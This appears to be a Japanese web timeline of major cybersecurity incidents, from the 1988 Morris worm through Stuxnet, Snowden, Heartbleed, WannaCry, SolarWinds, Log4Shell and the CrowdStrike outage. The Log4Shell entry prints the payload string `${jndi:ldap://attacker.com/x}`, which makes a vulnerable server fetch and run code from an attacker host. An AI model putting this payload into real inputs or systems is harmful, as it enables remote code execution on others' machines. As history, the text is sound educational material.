サイバーセキュリティの歴史

1988年11月2日夜、 コーネル大学院生 Robert Tappan Morris が公開したワームが、 sendmail・fingerd・rsh の脆弱性を連鎖的に突きながら自己複製し、 当時のインターネット約6万台のうち推定6,000台（約10%）を機能停止に追い込んだ。 自己複製のフォーク率設計ミスにより、 1台のホストで複数プロセスが暴走、 ネットワーク全体が事実上停止。 翌1989年、 Morris は1986年制定の Computer Fraud and Abuse Act（CFAA）違反で起訴された米国初の人物となり、 1990年に有罪判決を受ける。 この事件は DARPA に CERT/CC（Coordination Center）の創設を決断させ、 セキュリティインシデント対応という分野そのものの起点となった。

詳細を読む →

2010年6月、 ベラルーシのアンチウイルスベンダー VirusBlokAda の解析者がイランの顧客企業のシステムから不審なマルウェアを発見。 後に Symantec、 Kaspersky、 Langner Communications らの共同解析で全貌が明らかになる。 Stuxnet は4つのゼロデイ、 盗まれた正規のデジタル署名（Realtek、 JMicron）、 Windows と Siemens の Step7 / WinCC（PLC プログラミング環境）を経由してイラン・ナタンズのウラン濃縮施設の遠心分離機を物理的に破壊する設計だった。 米 NSA とイスラエル軍 Unit 8200 の共同作戦「Olympic Games」とされ、 推定で約1,000台のウラン濃縮用遠心分離機（IR-1）を破損させた。 「国家が物理世界の破壊を目的にマルウェアを使った」最初の事例として、 サイバー戦の概念を根本から定義し直した。

詳細を読む →

2013年6月5日、 *The Guardian* が NSA による Verizon 通話メタデータの大量収集を報じる Glenn Greenwald の記事を掲載。 6月6日、 *Washington Post* と *Guardian* が同時に PRISM プログラム（Google、 Facebook、 Apple 等から直接データを取得する仕組み）を公開。 情報源は、 香港のホテルから映像で姿を現した NSA 契約職員 **Edward Snowden**（当時29歳、 Booz Allen Hamilton 所属）。 続く数か月で XKeyscore、 Bullrun（暗号化破り計画）、 MUSCULAR（Google・Yahoo データセンター間光ファイバへの傍受）、 英 GCHQ の Tempora、 同盟国首脳の通信傍受 ── など総計約20万件以上の文書が公開された。 Snowden は香港経由でモスクワへ亡命し、 2026年現在もロシアに滞在。 グローバルなプライバシー議論、 E2E 暗号化普及（Signal、 WhatsApp）、 HTTPS Everywhere、 そして「監視資本主義」批判の起点。

詳細を読む →

2014年4月7日、 OpenSSL の Heartbeat 拡張に発見されたバッファオーバーリード脆弱性 **CVE-2014-0160（通称 Heartbleed）** が公表された。 Codenomicon と Google Security の Neel Mehta によりほぼ同時期に独立して発見。 攻撃者は対象サーバから最大64KBのメモリを繰り返し読み取り可能で、 結果として秘密鍵、 セッションクッキー、 ユーザのパスワードなどが漏れた。 脆弱なコードは2012年3月の OpenSSL 1.0.1リリースから2年間野放しで、 Apache + nginx が全Webサーバの66%以上を占める当時、 インターネットの大半が影響範囲。 OSS の重要コンポーネントを少人数が無償保守する構造的脆弱性を露呈し、 Linux Foundation の **Core Infrastructure Initiative**（後の OpenSSF） 設立、 OpenBSD による **LibreSSL** フォーク、 Google の **BoringSSL** 派生を生んだ。

詳細を読む →

2017年5月12日、 ランサムウェア「WannaCry」が世界 150 か国・推定30万台超の Windows 端末を暗号化した。 拡散には、 同年4月14日に **Shadow Brokers** が公開していた NSA 流出ツール **EternalBlue**（Microsoft SMBv1 の脆弱性 MS17-010 / CVE-2017-0144 を悪用）が使われた。 Microsoft は2017年3月14日にパッチを公開していたが、 未適用機が世界中に大量に残存。 英 NHS では病院運営が停止、 救急車の振り分け、 予約手術キャンセル等の実害。 攻撃開始から約7時間後、 英国の22歳セキュリティリサーチャー **Marcus Hutchins（MalwareTech）** がコード内のキルスイッチドメイン `iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com` を発見・登録し、 感染拡大を停止させた。 米英政府は北朝鮮 **Lazarus グループ** を実行犯として公的に帰属させた。

詳細を読む →

2020年12月13日、 セキュリティ企業 **FireEye**（後の Mandiant）と Microsoft が、 ネットワーク管理ソフト **SolarWinds Orion** の正規ビルドパイプラインに、 ロシア対外情報庁 **SVR**（米英呼称 APT29 / Cozy Bear / 後に「Midnight Blizzard」） が **SUNBURST バックドア** を埋め込んでいたことを公表した。 改竄された Orion 更新（バージョン 2019.4 HF5 〜 2020.2.1）は2020年3月〜6月に配布され、 **約18,000組織** がダウンロード。 さらに侵入が深化されたのは数百組織で、 米 **財務省、 国土安全保障省、 国務省、 司法省、 商務省、 エネルギー省、 NIH、 NTIA を含む9連邦機関**、 および Microsoft・Cisco・FireEye・Mimecast 等が含まれる。 FireEye が自社侵害を契機に発覚させた経緯から、 「攻撃者が一流セキュリティ企業を踏み台にしようとして失敗した」事例として記録される。 ソフトウェアサプライチェーン攻撃の典型・最大級事例。

詳細を読む →

2021年11月24日、 Alibaba Cloud のセキュリティチーム Chen Zhaojun が、 Apache Log4j 2.x の JNDI lookup 機能に起因するリモートコード実行脆弱性（後の **CVE-2021-44228**、 CVSS 10.0）を Apache Software Foundation へ報告。 12月9日、 概念実証コードが Twitter で公開され、 ASF は緊急パッチ（2.15.0）を公表する。 攻撃は極めて単純 ── 攻撃者制御の文字列 `${jndi:ldap://attacker.com/x}` がログ出力対象としてどこかに渡るだけで、 攻撃者サーバから Java バイトコードがダウンロード・実行される。 Minecraft Java 版のチャット入力で他プレイヤーのサーバを乗っ取れることが当初の発火例として広く拡散した。 影響範囲は数十億台規模 ── Log4j は Java エコシステムの事実上の標準ロガーで、 Apache、 Twitter、 Apple iCloud、 Steam、 Tencent QQ、 Amazon、 IBM、 Oracle ── ほぼすべての Java 系製品に深く埋め込まれていた。 ホワイトハウスは SBOM 推進と OSS セキュリティ会議を緊急招集、 米 CISA は政府機関に異例の年末対応を命じた。

詳細を読む →

7月19日、サイバーセキュリティ企業 CrowdStrike が配信した Falcon Sensor の更新ファイル（Channel File 291）の不具合により、 世界中の約850万台の Windows 端末が起動不能（ブルースクリーン）に陥った。 航空便（米デルタ航空は約7000便欠航、 損失5億ドル）、 病院、 銀行 ATM、 緊急通報システム、 放送局など、 重要インフラが同時停止。 推定経済損失は100億ドル超とされ、 単一の IT 障害として史上最大規模。 復旧には手動でセーフモード起動が必要で、 多くの組織が数日〜数週間を要した。 SaaS 型セキュリティ製品の供給網リスクと、 ソフトウェア検証プロセスの不備を世界規模で露呈した。

関連企業・組織

Microsoft

登場する年表

IT全史 ── 計算機が世界を編み変える · クラウドコンピューティングの歴史

詳細を読む →